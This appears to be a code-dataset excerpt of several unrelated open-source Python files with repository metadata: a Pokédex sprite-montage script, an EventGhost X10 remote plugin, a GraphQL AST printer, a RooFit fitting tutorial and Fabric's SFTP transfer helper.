other_filename='black-white-back.png',
pattern='pokemon/main-sprites/black-white/back/female/{0}.png',
fallback_pattern='pokemon/main-sprites/black-white/back/{0}.png',
sprite_size=96,
pokemon=649,
)
# Overworld
make_montage('overworld-right.png',
'pokemon/overworld/right/{0}.png', 32, 493, transparent=True)
make_montage('overworld-down.png',
'pokemon/overworld/down/{0}.png', 32, 493, transparent=True)
make_montage('overworld-up.png',
'pokemon/overworld/up/{0}.png', 32, 493, transparent=True)
make_montage('overworld-right-shiny.png',
'pokemon/overworld/shiny/right/{0}.png', 32, 493, transparent=True)
make_montage('overworld-down-shiny.png',
'pokemon/overworld/shiny/down/{0}.png', 32, 493, transparent=True)
make_montage('overworld-up-shiny.png',
'pokemon/overworld/shiny/up/{0}.png', 32, 493, transparent=True)
# Other miscellaneous
make_montage('footprints.png', 'pokemon/footprints/{0}.png', 16, 649)
make_montage('sugimori.png', 'pokemon/sugimori/{0}.png', 96, 493,
padding=2, filter='lanczos')
make_montage('conquest.png', 'pokemon/conquest/{0}.png', 128, None,
transparent=True)
make_labeled_montage(
'items.png', 'items', suffix='.png',
sprite_size=24, horiz_padding=36, vert_padding=6,
)
make_labeled_montage(
'berries.png', 'items/berries', suffix='.png',
sprite_size=48, horiz_padding=36, vert_padding=4,
)
def main_tarball(filename, contents):
"""As make_tarball, but prepends pokemon/main-sprites/ to all contents
"""
make_tarball(filename, ['pokemon/main-sprites/' + c for c in contents])
def make_tarball(filename, contents):
"""Packs `contents` into the tar file `filename`."""
print "Generating", filename + "...",
sys.stdout.flush()
tar = tarfile.open(filename, 'w:gz')
for content in contents:
tar.add(os.path.join(media_dir, content), arcname=content)
tar.close()
print "ok"
def main_montage(filename, pattern, *args, **kwargs):
"""As make_montage, but prepends pokemon/main-sprites/ to pattern
"""
make_montage(filename, 'pokemon/main-sprites/' + pattern, *args, **kwargs)
def make_montage(filename, pattern, sprite_size, pokemon=None,
padding=0, filter='point', transparent=False):
u"""Creates a montage in `filename` out of PNG images matching `pattern`,
which should be a str.format pattern. `sprite_size` is the size of each
sprite, for calculating the dimensions of the final product, and `pokemon`
is the number of Pokémon that should be in the resulting image.
`pokemon` being None means "all of them", for sidegames that include a
haphazard selection of Pokémon, e.g. Pokémon Conquest.
The background will be transparent iff `transparent` is true.
"""
print "Generating", filename + "...",
sys.stdout.flush()
transparent_switches = []
if transparent:
transparent_switches = ['-background', 'transparent']
# Find all the files we want
if pokemon is None:
files = glob(os.path.join(media_dir, pattern.format('*')))
# Filter out alternate forms to avoid duplicates
files = [name for name in files if '-' not in os.path.basename(name)]
files.sort(key=natural_sort_key)
else:
files = [
os.path.join(media_dir, pattern.format(n))
for n in range(1, pokemon + 1)
]
# Figure out the dimensions of the image. Try to keep to the golden ratio,
# because it rocks.
# Thus: rows * (phi * rows) = pokemon
rows = int(math.ceil( (len(files) / phi) ** 0.5 ))
outfile = os.path.join(downloads_dir, filename)
subprocess.Popen(
['montage',
'-filter', filter,
'-geometry', "{0}x{0}+{1}+{1}>".format(sprite_size, padding),
'-tile', "x{0}".format(rows),
]
+ files
+ transparent_switches
+ [outfile]
).wait()
# Optipng it
subprocess.Popen(['optipng', '-quiet', outfile]).wait()
print "ok"
def make_diff_montage(filename, other_filename, pattern, fallback_pattern,
sprite_size, pokemon):
u"""Similar to `make_montage`, except! This version assumes `pattern`
refers to a file that may or may not exist, and `fallback_pattern` fills in
the gaps. Also it then diffs the generated image with `other_filename`.
"""
print "Generating", filename + "...",
sys.stdout.flush()
# Find all the files we want
files = []
for n in range(1, pokemon + 1):
img = os.path.join(media_dir, pattern.format(n))
if os.path.exists(img):
files.append(img)
else:
files.append(
os.path.join(media_dir, fallback_pattern.format(n)))
# Golden ratio blah blah
rows = int(math.ceil( (pokemon / phi) ** 0.5 ))
outfile = os.path.join(downloads_dir, filename)
subprocess.Popen(
['montage',
'-background', 'transparent',
'-geometry', "{0}x{0}+0+0>".format(sprite_size),
'-tile', "x{0}".format(rows),
]
+ files
+ [outfile]
).wait()
# Do the comparison in-place
subprocess.Popen([
'compare',
outfile, os.path.join(downloads_dir, other_filename),
outfile,
]).wait()
# Optipng it
subprocess.Popen(['optipng', '-quiet', outfile]).wait()
print "ok"
def make_labeled_montage(filename, directory, suffix,
sprite_size, horiz_padding, vert_padding):
u"""Makes a montage, with labels, of the files in the named directory.
Only files ending in `suffix` will be used, and the suffix will be removed.
The rest is a bunch of boring math.
"""
print "Generating", filename + "...",
sys.stdout.flush()
# Find all the files we want
s = len(suffix)
file_args = []
file_count = 0
filenames = os.listdir(os.path.join(media_dir, directory))
filenames.sort()
for img in filenames:
if not img.endswith(suffix):
continue
# Cut off .png
label = img[:-s]
file_args.extend([
'-label',
label,
os.path.join(media_dir, directory, img),
])
file_count += 1
# Golden ratio blah blah. Except with the padding it becomes...
tile_h = sprite_size + vert_padding * 2 + 16 # 16 for label height
tile_w = sprite_size + horiz_padding * 2
# tile_h * rows * phi == tile_w * (n / rows)
    # => rows = sqrt((tile_w * n) / (tile_h * phi))
rows = int(math.ceil(
((tile_w * file_count) / (tile_h * phi)) ** 0.5
))
outfile = os.path.join(downloads_dir, filename)
subprocess.Popen(
['montage',
'-background', 'transparent',
'-geometry', "+{0}+{1}".format(horiz_padding, vert_padding),
'-tile', "x{0}".format(rows),
]
+ file_args
+ [outfile]
).wait()
# Optipng it
subprocess.Popen(['optipng', '-quiet', outfile]).wait()
print "ok"
def natural_sort_key(filename):
    groups = re.findall(r'\d+|\D+', filename)
groups = [(int(group) if group.isdigit() else group) for group in groups]
return groups
if __name__ == '__main__':
create_downloads()
|
veekun/spline-pokedex
|
bin/create-downloads.py
|
Python
|
mit
| 18,338
|
[
"CRYSTAL"
] |
fd98f62d19aaf4c692de2a2091417c3c26333ae1d96333d0f4396c4de334adc7
|
# -*- coding: utf-8 -*-
#
# This file is a plugin for EventGhost.
# Copyright © 2005-2019 EventGhost Project <http://www.eventghost.net/>
#
# EventGhost is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 2 of the License, or (at your option)
# any later version.
#
# EventGhost is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along
# with EventGhost. If not, see <http://www.gnu.org/licenses/>.
"""<rst>
Hardware plugin for X10 compatible RF remotes.
This includes remotes like:
* `ATI Remote Wonder
<http://www.ati.com/products/remotewonder/index.html>`_
* `ATI Remote Wonder PLUS
<http://www.ati.com/products/remotewonderplus/index.html>`_
* `SnapStream Firefly
<http://www.snapstream.com/products/firefly/>`_
* `NVIDIA Personal Cinema Remote
<http://www.nvidia.com/object/feature_PC_remote.html>`_
* `Marmitek PC Control
<http://www.marmitek.com/>`_
* `Pearl Q-Sonic Master Remote 6in1
<http://www.pearl.de/product.jsp?pdid=PE4444&catid=1601&vid=916&curr=DEM>`_
* `Niveus PC Remote Control
<http://www.niveusmedia.com/>`_
* Medion RF Remote Control
* Packard Bell RF MCE Remote Control OR32E
"""
import eg
eg.RegisterPlugin(
name = "X10 Remote",
author = "Bitmonster",
version = "1.0",
kind = "remote",
hardwareId = "USB\\VID_0BC7&PID_0006",
guid = "{C3E96757-E507-4CC3-A2E6-465D48B87D09}",
canMultiLoad = True,
description = __doc__,
url = "http://www.eventghost.net/forum/viewtopic.php?t=1589",
icon = (
"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAYklEQVR42mNkoBAwwhgq"
"uf//k6LxzmRGRrgBpGpGNoSRXM1wL1DFgNuTGBhU8xCCyHx0Ngggq4W7AKYQlwZchqJ4"
"Ad0l+AymvgHYFBJtAFUCkaJopMgAEEFRUoZxKMpMlAAAoBBdp8TBL7gAAAAASUVORK5C"
"YII="
),
)
import wx
from win32com.client import DispatchWithEvents
class Text:
allButton = "&All"
noneButton = "&None"
remoteBox = "Remote type:"
idBox = "Active IDs:"
usePrefix = "Event prefix:"
errorMesg = "No X10 receiver found!"
REMOTES = [
[
"ATI Remote Wonder",
{
'One': 'Num1',
'Two': 'Num2',
'Three': 'Num3',
'Four': 'Num4',
'Five': 'Num5',
'Six': 'Num6',
'Seven': 'Num7',
'Eight': 'Num8',
'Nine': 'Num9',
'Zero': 'Num0',
'MouseUp': 'Mouse000',
'MouseRightUp': 'Mouse045',
'MouseRight': 'Mouse090',
'MouseRightDown': 'Mouse135',
'MouseDown': 'Mouse180',
'MouseLeftDown': 'Mouse225',
'MouseLeft': 'Mouse270',
'MouseLeftUp': 'Mouse315',
'MTAddDelete': 'Menu',
'MTAB': 'Check',
}
],
[
"Medion",
{
'MTTV': 'TV',
'MTVCR': 'VCR',
'Book': 'Music',
'MTRadio': 'Radio',
'Web': 'Photo',
'MTPC': 'TVPreview',
'MTChannelList': 'ChannelList',
'D': 'Setup',
'MTAlbum': 'VideoDesktop',
'VolumeUp': 'VolumeDown',
'VolumeDown': 'VolumeUp',
'A': 'Mute',
'MTArtist': 'Red',
'MTGenre': 'Green',
'MTTrack': 'Yellow',
'MTUp': 'Blue',
'MTAddDelete': 'TXT',
'One': 'Num1',
'Two': 'Num2',
'Three': 'Num3',
'Four': 'Num4',
'Five': 'Num5',
'Six': 'Num6',
'Seven': 'Num7',
'Eight': 'Num8',
'Nine': 'Num9',
'Zero': 'Num0',
'Bookmark': 'ChannelSearch',
'Resize': 'Delete',
'MTLeft': 'Rename',
'MTAB': 'Snapshot',
'MTDown': 'AcquireImage',
'MTRight': 'EditImage',
'E': 'PreviousTrack',
'F': 'NextTrack',
'C': 'DVDMenu',
'MTPlaylist': 'DVDAudio',
'MTEnter': 'Fullscreen',
}
],
[
"Generic X10",
{
'One': 'Num1',
'Two': 'Num2',
'Three': 'Num3',
'Four': 'Num4',
'Five': 'Num5',
'Six': 'Num6',
'Seven': 'Num7',
'Eight': 'Num8',
'Nine': 'Num9',
'Zero': 'Num0',
}
],
[
"SnapStream FireFly",
{
'One': 'Num1',
'Two': 'Num2',
'Three': 'Num3',
'Four': 'Num4',
'Five': 'Num5',
'Six': 'Num6',
'Seven': 'Num7',
'Eight': 'Num8',
'Nine': 'Num9',
'Zero': 'Num0',
'MTTV': 'Maximize',
'Power': 'Close',
'MTAddDelete': 'Back',
'MTAB': 'Enter',
'VolumeDown': 'VolumeUp',
'VolumeUp': 'VolumeDown',
'A': 'FireFly',
'MTRadio': 'Info',
'MTPC': 'Option',
'Bookmark': 'Menu',
'Resize': 'Exit',
'Input': 'PreviousTrack',
'Zoom': 'NextTrack',
'Book': 'Music',
'Web': 'Photo',
'Hand': 'Video',
'B': 'Help',
'MTVCR': 'Mouse',
'C': 'A',
'D': 'B',
'E': 'C',
'F': 'D',
}
],
]
REMOTES_SORT_ORDER = [2, 0, 1, 3]
REMOTE_IDS = {
192: 1,
208: 2,
224: 3,
240: 4,
32: 5,
48: 6,
0: 7,
16: 8,
64: 9,
80: 10,
96: 11,
112: 12,
160: 13,
176: 14,
128: 15,
144: 16,
}
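# Hedged worked example (illustration only; the raw address is hypothetical):
# OnX10Command below masks lAddress with 0xF0 before the lookup, so an address
# of 0xD3 yields REMOTE_IDS[0xD3 & 0xF0] == REMOTE_IDS[208] == 2.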
class X10Events:
plugin = None
#@eg.LogIt
def OnX10Command(
self,
bszCommand,
eCommand,
lAddress,
eKeyState,
lSequence,
eCommandType,
varTimestamp
):
if eKeyState == 3:
return
plugin = self.plugin
remoteId = REMOTE_IDS[lAddress & 0xF0]
if remoteId not in plugin.ids:
return
event = str(bszCommand)
if eKeyState == 1:
plugin.TriggerEnduringEvent(plugin.mappingTable.get(event, event))
elif eKeyState == 2:
plugin.EndLastEvent()
class X10ThreadWorker(eg.ThreadWorker):
comInstance = None
plugin = None
eventHandler = None
def Setup(self, plugin, eventHandler):
self.plugin = plugin
self.eventHandler = eventHandler
self.comInstance = DispatchWithEvents(
'X10net.X10Control.1',
eventHandler
)
def Finish(self):
if self.comInstance:
self.comInstance.Close()
del self.comInstance
class X10(eg.PluginBase):
text = Text
def __init__(self):
self.AddEvents()
def __start__(self, remoteType=None, ids=None, prefix=None):
self.remoteType = remoteType
self.ids = ids
self.info.eventPrefix = prefix
self.mappingTable = REMOTES[remoteType][1]
class SubX10Events(X10Events):
plugin = self
self.workerThread = X10ThreadWorker(self, SubX10Events)
try:
self.workerThread.Start(20)
except:
raise self.Exception(self.text.errorMesg)
def __stop__(self):
self.workerThread.Stop(10)
def GetLabel(self, remoteType, *dummyArgs):
return "X10: " + REMOTES[remoteType][0]
def Configure(self, remoteType=2, ids=None, prefix="X10"):
panel = eg.ConfigPanel()
text = self.text
fbtypes = []
selection = 0
for i, remoteId in enumerate(REMOTES_SORT_ORDER):
fbtypes.append(REMOTES[remoteId][0])
if remoteId == remoteType:
selection = i
remoteTypeCtrl = panel.Choice(selection, fbtypes)
prefixCtrl = panel.TextCtrl(prefix)
btnsizer = wx.FlexGridSizer(4, 4)
idBtns = []
for i in xrange(16):
btn = wx.ToggleButton(panel, -1, size=(35, 35), label=str(i + 1))
if (ids is None) or ((i+1) in ids):
btn.SetValue(True)
btnsizer.Add(btn)
idBtns.append(btn)
selectAllButton = panel.Button(text.allButton, style=wx.BU_EXACTFIT)
def OnSelectAll(event):
for item in idBtns:
item.SetValue(True)
event.Skip()
selectAllButton.Bind(wx.EVT_BUTTON, OnSelectAll)
selectNoneButton = panel.Button(text.noneButton, style=wx.BU_EXACTFIT)
def OnSelectNone(event):
for item in idBtns:
item.SetValue(False)
event.Skip()
selectNoneButton.Bind(wx.EVT_BUTTON, OnSelectNone)
rightBtnSizer = eg.VBoxSizer(
(selectAllButton, 0, wx.EXPAND),
((5, 5), 1),
(selectNoneButton, 0, wx.EXPAND),
)
idSizer = eg.HBoxSizer(
(btnsizer),
((10, 10), 0),
(rightBtnSizer, 0, wx.EXPAND),
)
leftSizer = eg.VBoxSizer(
(panel.StaticText(text.remoteBox), 0, wx.BOTTOM, 2),
(remoteTypeCtrl, 0, wx.BOTTOM, 10),
(panel.StaticText(text.usePrefix), 0, wx.BOTTOM, 2),
(prefixCtrl),
)
rightSizer = eg.VBoxSizer(
(panel.StaticText(text.idBox), 0, wx.BOTTOM, 2),
(idSizer),
)
mainSizer = eg.HBoxSizer(
(leftSizer),
((0, 0), 1, wx.EXPAND),
(wx.StaticLine(panel, style=wx.LI_VERTICAL), 0, wx.EXPAND),
((0, 0), 1, wx.EXPAND),
(rightSizer),
((0, 0), 1, wx.EXPAND),
)
panel.sizer.Add(mainSizer, 1, wx.EXPAND)
while panel.Affirmed():
panel.SetResult(
REMOTES_SORT_ORDER[remoteTypeCtrl.GetValue()],
[i+1 for i, button in enumerate(idBtns) if button.GetValue()],
prefixCtrl.GetValue()
)
|
topic2k/EventGhost
|
plugins/X10/__init__.py
|
Python
|
gpl-2.0
| 10,254
|
[
"Firefly"
] |
658108862915845a9c1e29978d93ba76b4082c27962bb67c77eded016506c1df
|
import json
from .visitor import Visitor, visit
__all__ = ['print_ast']
def print_ast(ast):
return visit(ast, PrintingVisitor())
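# Hedged usage sketch (illustration only): round-tripping a parsed document.
# Assumes the parse() function from graphql-core's parser module; the query
# string is hypothetical.
#
#     from graphql.language.parser import parse
#     document = parse('{ hero { name } }')
#     print_ast(document)   # -> roughly '{\n  hero {\n    name\n  }\n}\n'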
class PrintingVisitor(Visitor):
__slots__ = ()
def leave_Name(self, node, *args):
return node.value
def leave_Variable(self, node, *args):
return '$' + node.name
def leave_Document(self, node, *args):
return join(node.definitions, '\n\n') + '\n'
def leave_OperationDefinition(self, node, *args):
name = node.name
selection_set = node.selection_set
op = node.operation
var_defs = wrap('(', join(node.variable_definitions, ', '), ')')
directives = join(node.directives, ' ')
if not name and not directives and not var_defs and op == 'query':
return selection_set
return join([op, join([name, var_defs]), directives, selection_set], ' ')
def leave_VariableDefinition(self, node, *args):
return node.variable + ': ' + node.type + wrap(' = ', node.default_value)
def leave_SelectionSet(self, node, *args):
return block(node.selections)
def leave_Field(self, node, *args):
return join([
wrap('', node.alias, ': ') + node.name + wrap('(', join(node.arguments, ', '), ')'),
join(node.directives, ' '),
node.selection_set
], ' ')
def leave_Argument(self, node, *args):
return node.name + ': ' + node.value
# Fragments
def leave_FragmentSpread(self, node, *args):
return '...' + node.name + wrap(' ', join(node.directives, ' '))
def leave_InlineFragment(self, node, *args):
return join([
'...',
wrap('on ', node.type_condition),
join(node.directives, ''),
node.selection_set
], ' ')
def leave_FragmentDefinition(self, node, *args):
return ('fragment {} on {} '.format(node.name, node.type_condition) +
wrap('', join(node.directives, ' '), ' ') +
node.selection_set)
# Value
def leave_IntValue(self, node, *args):
return node.value
def leave_FloatValue(self, node, *args):
return node.value
def leave_StringValue(self, node, *args):
return json.dumps(node.value)
def leave_BooleanValue(self, node, *args):
return json.dumps(node.value)
def leave_EnumValue(self, node, *args):
return node.value
def leave_ListValue(self, node, *args):
return '[' + join(node.values, ', ') + ']'
def leave_ObjectValue(self, node, *args):
return '{' + join(node.fields, ', ') + '}'
def leave_ObjectField(self, node, *args):
return node.name + ': ' + node.value
# Directive
def leave_Directive(self, node, *args):
return '@' + node.name + wrap('(', join(node.arguments, ', '), ')')
# Type
def leave_NamedType(self, node, *args):
return node.name
def leave_ListType(self, node, *args):
return '[' + node.type + ']'
def leave_NonNullType(self, node, *args):
return node.type + '!'
# Type Definitions:
def leave_SchemaDefinition(self, node, *args):
return join([
'schema',
join(node.directives, ' '),
block(node.operation_types),
], ' ')
def leave_OperationTypeDefinition(self, node, *args):
return '{}: {}'.format(node.operation, node.type)
def leave_ScalarTypeDefinition(self, node, *args):
return 'scalar ' + node.name + wrap(' ', join(node.directives, ' '))
def leave_ObjectTypeDefinition(self, node, *args):
return join([
'type',
node.name,
wrap('implements ', join(node.interfaces, ', ')),
join(node.directives, ' '),
block(node.fields)
], ' ')
def leave_FieldDefinition(self, node, *args):
return (
node.name +
wrap('(', join(node.arguments, ', '), ')') +
': ' +
node.type +
wrap(' ', join(node.directives, ' '))
)
def leave_InputValueDefinition(self, node, *args):
return node.name + ': ' + node.type + wrap(' = ', node.default_value) + wrap(' ', join(node.directives, ' '))
def leave_InterfaceTypeDefinition(self, node, *args):
return 'interface ' + node.name + wrap(' ', join(node.directives, ' ')) + ' ' + block(node.fields)
def leave_UnionTypeDefinition(self, node, *args):
return 'union ' + node.name + wrap(' ', join(node.directives, ' ')) + ' = ' + join(node.types, ' | ')
def leave_EnumTypeDefinition(self, node, *args):
return 'enum ' + node.name + wrap(' ', join(node.directives, ' ')) + ' ' + block(node.values)
def leave_EnumValueDefinition(self, node, *args):
return node.name + wrap(' ', join(node.directives, ' '))
def leave_InputObjectTypeDefinition(self, node, *args):
return 'input ' + node.name + wrap(' ', join(node.directives, ' ')) + ' ' + block(node.fields)
def leave_TypeExtensionDefinition(self, node, *args):
return 'extend ' + node.definition
def leave_DirectiveDefinition(self, node, *args):
return 'directive @{}{} on {}'.format(node.name, wrap(
'(', join(node.arguments, ', '), ')'), ' | '.join(node.locations))
def join(maybe_list, separator=''):
if maybe_list:
return separator.join(filter(None, maybe_list))
return ''
def block(_list):
'''Given a list, print each item on its own line, wrapped in an indented "{ }" block.'''
if _list:
return indent('{\n' + join(_list, '\n')) + '\n}'
return '{}'
def wrap(start, maybe_str, end=''):
if maybe_str:
return start + maybe_str + end
return ''
def indent(maybe_str):
if maybe_str:
return maybe_str.replace('\n', '\n ')
return maybe_str
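# Minimal illustration of the helpers above (comments only, not executed):
#
#   join(['a', None, 'b'], ', ')  -> 'a, b'      (None entries are dropped)
#   wrap('(', 'x: 1', ')')        -> '(x: 1)'
#   wrap('(', '', ')')            -> ''          (empty content yields '')
#   block(['a', 'b'])             -> '{\n  a\n  b\n}'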
|
wandb/client
|
wandb/vendor/graphql-core-1.1/wandb_graphql/language/printer.py
|
Python
|
mit
| 5,888
|
[
"VisIt"
] |
807f88fa089e597c3d15c088212697a312bfbff9b39a1cc03aac2246255b4d0f
|
## \file
## \ingroup tutorial_roofit
## \notebook
## Basic functionality: interpreted functions and pdfs
##
## \macro_code
##
## \date February 2018
## \authors Clemens Lange, Wouter Verkerke (C++ version)
import ROOT
# Generic interpreted pdf
# ------------------------------
# Declare observable x
x = ROOT.RooRealVar("x", "x", -20, 20)
# Construct generic pdf from interpreted expression
# ------------------------------------------------------
# To construct a proper pdf, the formula expression is explicitly normalized internally by dividing
# it by a numeric integral of the expression over x in the range [-20,20]
#
alpha = ROOT.RooRealVar("alpha", "alpha", 5, 0.1, 10)
genpdf = ROOT.RooGenericPdf(
"genpdf",
"genpdf",
"(1+0.1*abs(x)+sin(sqrt(abs(x*alpha+0.1))))",
ROOT.RooArgList(
x,
alpha))
# Sample, fit and plot generic pdf
# ---------------------------------------------------------------
# Generate a toy dataset from the interpreted pdf
data = genpdf.generate(ROOT.RooArgSet(x), 10000)
# Fit the interpreted pdf to the generated data
genpdf.fitTo(data)
# Make a plot of the data and the pdf overlaid
xframe = x.frame(ROOT.RooFit.Title("Interpreted expression pdf"))
data.plotOn(xframe)
genpdf.plotOn(xframe)
# Standard pdf adjusted with an interpreted helper function
# ------------------------------------------------------------------------------------------------------------
# Make a gauss(x,sqrt(mean2),sigma) from a standard ROOT.RooGaussian
#
# Construct standard pdf with formula replacing parameter
# ------------------------------------------------------------------------------------------------------------
# Construct parameter mean2 and sigma
mean2 = ROOT.RooRealVar("mean2", "mean^2", 10, 0, 200)
sigma = ROOT.RooRealVar("sigma", "sigma", 3, 0.1, 10)
# Construct interpreted function mean = sqrt(mean^2)
mean = ROOT.RooFormulaVar(
"mean", "mean", "sqrt(mean2)", ROOT.RooArgList(mean2))
# Construct a gaussian g2(x,sqrt(mean2),sigma)
g2 = ROOT.RooGaussian("g2", "h2", x, mean, sigma)
# Generate toy data
# ---------------------------------
# Construct a separate gaussian g1(x,10,3) to generate a toy Gaussian
# dataset with mean 10 and width 3
g1 = ROOT.RooGaussian("g1", "g1", x, ROOT.RooFit.RooConst(
10), ROOT.RooFit.RooConst(3))
data2 = g1.generate(ROOT.RooArgSet(x), 1000)
# Fit and plot tailored standard pdf
# -------------------------------------------------------------------
# Fit g2 to data from g1
r = g2.fitTo(data2, ROOT.RooFit.Save()) # ROOT.RooFitResult
r.Print()
# Plot data on frame and overlay projection of g2
xframe2 = x.frame(ROOT.RooFit.Title("Tailored Gaussian pdf"))
data2.plotOn(xframe2)
g2.plotOn(xframe2)
# Draw all frames on a canvas
c = ROOT.TCanvas("rf103_interprfuncs", "rf103_interprfuncs", 800, 400)
c.Divide(2)
c.cd(1)
ROOT.gPad.SetLeftMargin(0.15)
xframe.GetYaxis().SetTitleOffset(1.4)
xframe.Draw()
c.cd(2)
ROOT.gPad.SetLeftMargin(0.15)
xframe2.GetYaxis().SetTitleOffset(1.4)
xframe2.Draw()
c.SaveAs("rf103_interprfuncs.png")
|
root-mirror/root
|
tutorials/roofit/rf103_interprfuncs.py
|
Python
|
lgpl-2.1
| 3,103
|
[
"Gaussian"
] |
9147aae81fcea97d40fa6998440f02f74fe200fdd431a31586a6fac8c4f73ed3
|
from __future__ import with_statement
import hashlib
import os
import stat
import tempfile
from fnmatch import filter as fnfilter
from fabric.state import output, connections, env
from fabric.utils import warn
class SFTP(object):
"""
SFTP helper class, which is also a facade for paramiko.SFTPClient.
"""
def __init__(self, host_string):
self.ftp = connections[host_string].open_sftp()
# Recall that __getattr__ is the "fallback" attribute getter, and is thus
# pretty safe to use for facade-like behavior as we're doing here.
def __getattr__(self, attr):
return getattr(self.ftp, attr)
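    # Sketch of the facade behaviour (assumes an already-open fabric
    # connection for host string 'web1'):
    #
    #   ftp = SFTP('web1')
    #   ftp.listdir('/var/log')   # not defined here -> forwarded to paramiko
    #   ftp.isdir('/var/log')     # defined on SFTP itself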
def isdir(self, path):
try:
return stat.S_ISDIR(self.ftp.lstat(path).st_mode)
except IOError:
return False
def islink(self, path):
try:
return stat.S_ISLNK(self.ftp.lstat(path).st_mode)
except IOError:
return False
def exists(self, path):
try:
self.ftp.lstat(path).st_mode
except IOError:
return False
return True
def glob(self, path):
from fabric.state import win32
dirpart, pattern = os.path.split(path)
rlist = self.ftp.listdir(dirpart)
names = fnfilter([f for f in rlist if not f[0] == '.'], pattern)
ret = [path]
if len(names):
s = '/'
ret = [dirpart.rstrip(s) + s + name.lstrip(s) for name in names]
if not win32:
ret = [os.path.join(dirpart, name) for name in names]
return ret
def walk(self, top, topdown=True, onerror=None, followlinks=False):
from os.path import join, isdir, islink
# We may not have read permission for top, in which case we can't get a
# list of the files the directory contains. os.path.walk always
# suppressed the exception then, rather than blow up for a minor reason
# when (say) a thousand readable directories are still left to visit.
# That logic is copied here.
try:
            # Unlike os.walk, list the directory via the SFTP client rather
            # than the local filesystem.
names = self.ftp.listdir(top)
except Exception, err:
if onerror is not None:
onerror(err)
return
dirs, nondirs = [], []
for name in names:
if self.isdir(join(top, name)):
dirs.append(name)
else:
nondirs.append(name)
if topdown:
yield top, dirs, nondirs
for name in dirs:
path = join(top, name)
if followlinks or not self.islink(path):
for x in self.walk(path, topdown, onerror, followlinks):
yield x
if not topdown:
yield top, dirs, nondirs
def mkdir(self, path, use_sudo):
from fabric.api import sudo, hide
if use_sudo:
with hide('everything'):
sudo('mkdir %s' % path)
else:
self.ftp.mkdir(path)
def get(self, remote_path, local_path, local_is_path, rremote=None):
# rremote => relative remote path, so get(/var/log) would result in
# this function being called with
# remote_path=/var/log/apache2/access.log and
# rremote=apache2/access.log
rremote = rremote if rremote is not None else remote_path
# Handle format string interpolation (e.g. %(dirname)s)
path_vars = {
'host': env.host_string.replace(':', '-'),
'basename': os.path.basename(rremote),
'dirname': os.path.dirname(rremote),
'path': rremote
}
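        # Illustrative interpolation (sketch only): with env.host_string
        # 'web1:22' and rremote 'apache2/access.log', a local_path template of
        # 'backups/%(host)s/%(path)s' expands to
        # 'backups/web1-22/apache2/access.log' before being abspath'd below.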
if local_is_path:
# Interpolate, then abspath (to make sure any /// are compressed)
local_path = os.path.abspath(local_path % path_vars)
# Ensure we give Paramiko a file by prepending and/or creating
# local directories as appropriate.
dirpath, filepath = os.path.split(local_path)
if dirpath and not os.path.exists(dirpath):
os.makedirs(dirpath)
if os.path.isdir(local_path):
local_path = os.path.join(local_path, path_vars['basename'])
if output.running:
print("[%s] download: %s <- %s" % (
env.host_string,
local_path if local_is_path else "<file obj>",
remote_path
))
# Warn about overwrites, but keep going
if local_is_path and os.path.exists(local_path):
msg = "Local file %s already exists and is being overwritten."
warn(msg % local_path)
# Have to bounce off FS if doing file-like objects
fd, real_local_path = None, local_path
if not local_is_path:
fd, real_local_path = tempfile.mkstemp()
self.ftp.get(remote_path, real_local_path)
# Return file contents (if it needs stuffing into a file-like obj)
# or the final local file path (otherwise)
result = None
if not local_is_path:
file_obj = os.fdopen(fd)
result = file_obj.read()
# Clean up temporary file
file_obj.close()
os.remove(real_local_path)
else:
result = real_local_path
return result
def get_dir(self, remote_path, local_path):
# Decide what needs to be stripped from remote paths so they're all
# relative to the given remote_path
if os.path.basename(remote_path):
strip = os.path.dirname(remote_path)
else:
strip = os.path.dirname(os.path.dirname(remote_path))
# Store all paths gotten so we can return them when done
result = []
# Use our facsimile of os.walk to find all files within remote_path
for context, dirs, files in self.walk(remote_path):
# Normalize current directory to be relative
# E.g. remote_path of /var/log and current dir of /var/log/apache2
# would be turned into just 'apache2'
lcontext = rcontext = context.replace(strip, '', 1).lstrip('/')
# Prepend local path to that to arrive at the local mirrored
# version of this directory. So if local_path was 'mylogs', we'd
# end up with 'mylogs/apache2'
lcontext = os.path.join(local_path, lcontext)
# Download any files in current directory
for f in files:
# Construct full and relative remote paths to this file
rpath = os.path.join(context, f)
rremote = os.path.join(rcontext, f)
# If local_path isn't using a format string that expands to
# include its remote path, we need to add it here.
if "%(path)s" not in local_path \
and "%(dirname)s" not in local_path:
lpath = os.path.join(lcontext, f)
# Otherwise, just passthrough local_path to self.get()
else:
lpath = local_path
# Now we can make a call to self.get() with specific file paths
# on both ends.
result.append(self.get(rpath, lpath, True, rremote))
return result
def put(self, local_path, remote_path, use_sudo, mirror_local_mode, mode,
local_is_path):
from fabric.api import sudo, hide
pre = self.ftp.getcwd()
pre = pre if pre else ''
if local_is_path and self.isdir(remote_path):
basename = os.path.basename(local_path)
remote_path = os.path.join(remote_path, basename)
if output.running:
print("[%s] put: %s -> %s" % (
env.host_string,
local_path if local_is_path else '<file obj>',
os.path.join(pre, remote_path)
))
# When using sudo, "bounce" the file through a guaranteed-unique file
# path in the default remote CWD (which, typically, the login user will
# have write permissions on) in order to sudo(mv) it later.
if use_sudo:
target_path = remote_path
hasher = hashlib.sha1()
hasher.update(env.host_string)
hasher.update(target_path)
remote_path = hasher.hexdigest()
# Have to bounce off FS if doing file-like objects
fd, real_local_path = None, local_path
if not local_is_path:
fd, real_local_path = tempfile.mkstemp()
old_pointer = local_path.tell()
local_path.seek(0)
file_obj = os.fdopen(fd, 'wb')
file_obj.write(local_path.read())
file_obj.close()
local_path.seek(old_pointer)
rattrs = self.ftp.put(real_local_path, remote_path)
# Clean up
if not local_is_path:
os.remove(real_local_path)
# Handle modes if necessary
if (local_is_path and mirror_local_mode) or (mode is not None):
lmode = os.stat(local_path).st_mode if mirror_local_mode else mode
lmode = lmode & 07777
rmode = rattrs.st_mode & 07777
if lmode != rmode:
if use_sudo:
with hide('everything'):
sudo('chmod %o \"%s\"' % (lmode, remote_path))
else:
self.ftp.chmod(remote_path, lmode)
if use_sudo:
with hide('everything'):
sudo("mv \"%s\" \"%s\"" % (remote_path, target_path))
# Revert to original remote_path for return value's sake
remote_path = target_path
return remote_path
